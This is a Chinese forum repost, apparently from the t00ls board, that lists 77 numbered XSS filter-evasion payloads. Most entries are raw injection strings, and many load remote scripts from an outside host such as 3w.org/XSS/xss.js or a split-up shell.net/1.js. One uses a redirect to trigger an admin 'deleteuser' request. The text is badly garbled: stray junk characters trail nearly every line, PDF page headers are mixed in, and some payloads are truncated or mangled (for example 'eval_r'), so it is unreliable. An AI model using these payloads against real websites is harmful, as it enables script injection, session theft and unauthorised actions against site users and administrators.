貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。: V/ K5 o `: h1 {
(1)普通的XSS JavaScript注入/ l5 \/ V* Z' H" d3 M4 C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 |7 h3 \4 Y! X(2)IMG标签XSS使用JavaScript命令
/ ?; {: r# ? G! b8 Z$ K1 F2 |<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" y6 D1 q1 @7 s+ T
(3)IMG标签无分号无引号, ?7 Y& y4 D8 v) a
<IMG SRC=javascript:alert(‘XSS’)>
$ s; y) H/ F1 u/ X0 {- f2 n/ ^(4)IMG标签大小写不敏感
" N9 x" X" s$ J9 u6 L8 V" r<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- m% S) ?' b# Z. N& ]' e
(5)HTML编码(必须有分号)
1 v6 D- p7 c7 @% h1 ~<IMG SRC=javascript:alert(“XSS”)>
# h* O! R0 K" z, i9 _(6)修正缺陷IMG标签% Q3 I3 K7 c9 |! W
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; G) N2 z" [, h/ P7 Z
. c" a- I O( ?0 j
- B; j* q& q+ R) ]+ w; M2 c& ^(7)formCharCode标签(计算器)4 l1 i7 t% Z. _9 L0 F% p( Q7 U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' Z6 i1 K0 M0 o0 } }7 g, R$ i
(8)UTF-8的Unicode编码(计算器)
4 n" V5 E/ I+ k<IMG SRC=jav..省略..S')>, j( g1 i2 \$ W" [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' V2 m* z# G. v. N<IMG SRC=jav..省略..S')>' @) h' L3 |5 t0 G9 M) s
(10)十六进制编码也是没有分号(计算器)1 \2 L$ H% ^9 u: Y# q- E5 @/ K
<IMG SRC=java..省略..XSS')>$ h4 ]( y+ ?% C
(11)嵌入式标签,将Javascript分开
$ E7 b4 T. D6 \. ?. k* U3 a# @<IMG SRC=”jav ascript:alert(‘XSS’);”>% D" x" k! R% V
(12)嵌入式编码标签,将Javascript分开
# f2 z7 \+ @& q' l<IMG SRC=”jav ascript:alert(‘XSS’);”>& k1 q! n6 l# ? N9 e
(13)嵌入式换行符. P0 a' x+ U# z7 w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# m" v7 w. c$ s A% N) R# C2 q(14)嵌入式回车
; ` ], s: T. w6 R$ y<IMG SRC=”jav ascript:alert(‘XSS’);”>3 {1 H/ W; w8 a
(15)嵌入式多行注入JavaScript,这是XSS极端的例子, v7 C( ]) `4 C1 i' G. F) ?
<IMG SRC=”javascript:alert(‘XSS‘)”>9 f8 P+ D5 z: l+ d9 ~. X
(16)解决限制字符(要求同页面)
6 q* c0 x( I6 S4 Q8 v) [% W<script>z=’document.’</script>* N1 V1 K1 ]! m" I8 c1 V/ j5 z, ` T
<script>z=z+’write(“‘</script>: v, z0 b5 |! |6 O5 o) t- t
<script>z=z+’<script’</script>- n# t/ C! f4 p1 |1 ?: w: J; j& E
<script>z=z+’ src=ht’</script>* Y( b x8 J) U z( t9 }3 z
<script>z=z+’tp://ww’</script>
* v+ h9 [# Z* g% G) q<script>z=z+’w.shell’</script>
4 q: \0 I7 i6 \ L1 S4 a7 Z<script>z=z+’.net/1.’</script>" d6 h" ~; Y3 k9 }
<script>z=z+’js></sc’</script>4 {) i c6 L5 [8 x
<script>z=z+’ript>”)’</script>
4 O# z8 S# p* ]<script>eval_r(z)</script>
- o$ W3 F/ g- P+ E* I& K* \! @$ Q(17)空字符12-7-1 T00LS - Powered by Discuz! Board
7 x8 P( m# C2 mhttps://www.t00ls.net/viewthread ... table&tid=15267 2/65 O1 @( u& l+ J/ z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; |' x$ Z7 B4 k' i
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( R% h. l- |+ W5 i8 ^
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 I# n/ ]4 P2 p. h( s(19)Spaces和meta前的IMG标签
) C. V3 @4 s4 H+ J |' `<IMG SRC=” javascript:alert(‘XSS’);”>, J5 u0 ~; b e9 V( E. ^
(20)Non-alpha-non-digit XSS
- Q( b$ J d0 X<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* H* L x* y. O8 s(21)Non-alpha-non-digit XSS to 2
0 v& t3 O% V+ ^: A2 O<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>, \8 Y" j2 y' _ {: n* Y0 C/ w
(22)Non-alpha-non-digit XSS to 35 ?2 Q( a6 e. I, k' Y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. M. x8 h0 M1 g. ]
(23)双开括号4 p1 s1 Q2 P9 ~9 D3 y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>) Y. R3 O U& J/ ^8 e1 a8 B% Z
(24)无结束脚本标记(仅火狐等浏览器)% B- t' {' T7 q3 p
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 B1 g. ~. E# C: w6 v, r
(25)无结束脚本标记28 j5 c. C1 \% S }' w# a, k
<SCRIPT SRC=//3w.org/XSS/xss.js>7 h6 A7 i0 S! b3 L+ Z5 g$ g
(26)半开的HTML/JavaScript XSS
# J6 g0 Z- n* I) p) H7 M( h<IMG SRC=”javascript:alert(‘XSS’)”
2 L1 G- Y& n/ W(27)双开角括号 c) q* m! w! o
<iframe src=http://3w.org/XSS.html <
! D: L- D- ?0 f(28)无单引号 双引号 分号
8 G) h/ F+ B2 N U- D2 h+ I<SCRIPT>a=/XSS/
, v' q. T! P2 S: T2 ?& palert(a.source)</SCRIPT># ^: k+ d: u# ], |0 |0 c: \" h
(29)换码过滤的JavaScript
9 o$ C( n- t5 [\”;alert(‘XSS’);//& G: J- v$ M6 |- q I( K7 b1 I
(30)结束Title标签# e8 W+ M' ], C- ?, M
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* o& I K( G5 F+ ~
(31)Input Image
3 t' p/ l+ I( L7 W8 s' z<INPUT SRC=”javascript:alert(‘XSS’);”>
. a: n7 F8 _2 l$ f4 q! M(32)BODY Image
, a: Z/ M7 f$ ^$ d7 S<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ s) h; i& L+ C# g. r
(33)BODY标签
Q) `$ Q6 S1 M7 q<BODY(‘XSS’)>
! u& g& Q( [% `# ] ^* @( |1 g8 m) r(34)IMG Dynsrc
% v/ e& U* q! Z<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 w1 w6 }. o0 F0 j$ T(35)IMG Lowsrc
; \0 L, E% |8 S7 C' z8 s( v- Y<IMG LOWSRC=”javascript:alert(‘XSS’)”>
; j6 M6 z) k2 v(36)BGSOUND
3 A! F/ ^& z: m' B: L# n& s<BGSOUND SRC=”javascript:alert(‘XSS’);”>9 z. Q+ Y, \# B! R% P/ p: R/ z
(37)STYLE sheet' e7 v+ E& Z, }) T: |: y3 f" \
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& E3 G! R) ^/ M7 e1 W* I(38)远程样式表
0 l# ^6 e3 I% s! R, x+ P1 o; I<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# w* l3 n; t4 Q7 d' a3 p9 B* m(39)List-style-image(列表式)* d: _/ e; j0 _3 h# l+ t1 L
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 e% s2 _; O: J% h$ i! o! J: f
(40)IMG VBscript
) m( @1 \& F# x3 V# J8 h<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" }0 @- ~, i- p8 y; h0 Y(41)META链接url, {' W" M6 d y
* Z# y. v6 q: J7 `% a: C& l* R* c" r- r% x. c
<META HTTP-EQUIV=”refresh” CONTENT=”0;
$ p( B& d6 I6 r* M* vURL=http://;URL=javascript:alert(‘XSS’);”>
, K; y7 U5 }2 ~% p9 {: u; y(42)Iframe( k( q: L* I/ p" j K, H A
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 N7 F& H) ], W( y( z% g
(43)Frame% f) q4 E( s+ c3 G4 ^; Q$ O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: z3 [1 F$ H4 nhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6# P% |( y- Q k% V, O# ^
(44)Table9 R, a9 k8 U3 D" }6 z! d
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> T4 {1 W' B0 z. I+ x+ ^; `
(45)TD+ m" U9 _' K! V5 g7 B* G/ y! r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; {# Q; k" H, h8 i
(46)DIV background-image
8 Z7 \5 y3 Y: v* s1 t6 M% c3 V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; I0 |) b) i- T9 [. V. u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
/ [- m c; r# m! |0 [. N8&13&12288&65279)* \+ [7 _; G0 Y. h5 s
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* N0 A: e% ?! T! b% e( a; o
(48)DIV expression. Y v6 d4 \+ y( o6 E% {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
b$ T6 D" p' }+ S9 V; P' M(49)STYLE属性分拆表达
3 e- P9 @+ F, L/ E) a/ p+ g$ ?! L<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; F4 I, o- G7 M, Z$ W(50)匿名STYLE(组成:开角号和一个字母开头)
7 {! }0 e8 i) ^' {0 d# K<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 R5 q6 G+ e) Y7 r" K
(51)STYLE background-image! ]- m3 f1 m% k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; \1 q; [; ]) z. xCLASS=XSS></A>
( g" Q/ {; z; k6 g(52)IMG STYLE方式1 u0 ?; i: E3 q6 r" \, p
exppression(alert(“XSS”))’>: v2 w# E8 z, u1 k5 n- g
(53)STYLE background
: V+ a( |: Y: w* D7 ~% P: X<STYLE><STYLE
+ W' V5 \- F5 H5 w7 T! utype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' i9 E' {2 K! z3 x; ?
(54)BASE3 i% _+ f$ X; ]1 k0 G( r6 |
<BASE HREF=”javascript:alert(‘XSS’);//”>5 Y0 m! u6 h7 T6 F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ O5 \0 M5 R, K<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 W7 M. K0 \, m7 w. V' V7 H(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 k) Y7 }9 {9 w8 b' ia=”get”;% K! U# H9 N+ _9 j
b=”URL(\”";% _# m6 M: r% o- e# ]. }
c=”javascript:”;
& S# [* ^1 z9 `2 Dd=”alert(‘XSS’);\”)”;
2 V& }# ^+ D4 u! o2 d$ x0 xeval_r(a+b+c+d);
0 V# m$ o/ _: {- Z" c* O* W/ ^(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! \! v d2 c, N# o4 y& r<HTML xmlns:xss>
9 n4 D n! L* ]7 W, Z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 ~! B) i/ ~- T# b/ l( h3 }6 Q<xss:xss>XSS</xss:xss>
9 z7 w* M, ?) _& B8 b</HTML>
/ q$ j5 a' ~2 N/ G& I, X(58)如果过滤了你的JS你可以在图片里添加JS代码来利用; K/ ~/ ?- l) m% H. |- c
<SCRIPT SRC=””></SCRIPT>) U) n9 C! e* h) ^8 e: M; b
(59)IMG嵌入式命令,可执行任意命令
- \0 C' G& T" M+ i<IMG SRC=”http://www.XXX.com/a.php?a=b”>
6 h9 v( }6 V0 a: ?8 z(60)IMG嵌入式命令(a.jpg在同服务器)
; [7 V! C! G8 @- A) aRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' O# k. g9 t$ B$ `" [(61)绕符号过滤
! }8 b/ N3 e3 I+ u: j8 }& I4 F<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT> |- E M, M" D% V7 k4 @% i
(62)
; O; c3 j( ]; ]" g" q<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 v- T5 ]+ `1 r3 p) E, w2 P& g(63)
% i; M, J( g" g/ d4 m8 w+ B B- t$ n<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: z7 C3 u2 b* A0 Y(64)' d, F# I1 X: x0 |6 e
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 p% a$ d B2 A" p' ?% o1 Q
(65)/ H# X {, `! e$ ~1 I6 T9 }6 d
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 B$ p* p, E% r1 h5 g
(66)12-7-1 T00LS - Powered by Discuz! Board
+ ]9 \; N4 n1 p' ^. e- [* @$ Shttps://www.t00ls.net/viewthread ... table&tid=15267 4/69 _4 R. G3 R1 `2 k( ?1 e( m- v
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. w+ y8 `$ l/ Z w(67)& q8 r" |* G# F8 M8 B3 W1 C6 H9 d
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>; J2 C/ \+ B) V3 P( A% v" e
</SCRIPT>3 x: ?3 t0 p/ f; `) W
(68)URL绕行
5 l- L& q. U% j/ J<A HREF=”http://127.0.0.1/”>XSS</A># b4 L) a) \3 |2 I
(69)URL编码
) M) M( }: l- T8 v<A HREF=”http://3w.org”>XSS</A>
% a: F% `9 V8 w' T# N(70)IP十进制
% O2 ~2 C* z. [* D& N# Y<A HREF=”http://3232235521″>XSS</A>/ {# T) _! j( q" _$ ]5 A
(71)IP十六进制
8 _1 f0 j6 g1 l6 y" F9 U<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
' D( D6 A$ H$ q0 F" ^) B(72)IP八进制
6 e- }; y7 e$ h: O<A HREF=”http://0300.0250.0000.0001″>XSS</A># z, e W7 W- l* U
(73)混合编码3 f$ }2 \ @' t, f* p6 p6 t
<A HREF=”h/ T' p$ S% S# W* @/ f. z3 n* F
tt p://6 6.000146.0×7.147/”">XSS</A>
8 _, x! [: ~% K( b3 J! \(74)节省[http:]
0 D6 V, T. i4 w<A HREF=”//www.google.com/”>XSS</A># V8 V! T, i; o6 `
(75)节省[www]
2 g1 N; ?+ O% q<A HREF=”http://google.com/”>XSS</A>* ]* J7 c( m# q
(76)绝对点绝对DNS
+ w' K/ w Q& T) u- u, O<A HREF=”http://www.google.com./”>XSS</A>
- K% c+ A+ I" Q1 L/ U9 h! t(77)javascript链接
1 y2 F' L- a- l/ ~$ z<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) h/ Z( [5 {+ ~1 Q
% `, b* F! V# U' o( s# E原文地址:http://fuzzexp.org/u/0day/?p=149 N- w ?+ p$ f' M% l
% }5 h; {/ ]9 p8 A2 L9 B |
发表于 2013-4-19 19:22:37
收藏
支持
反对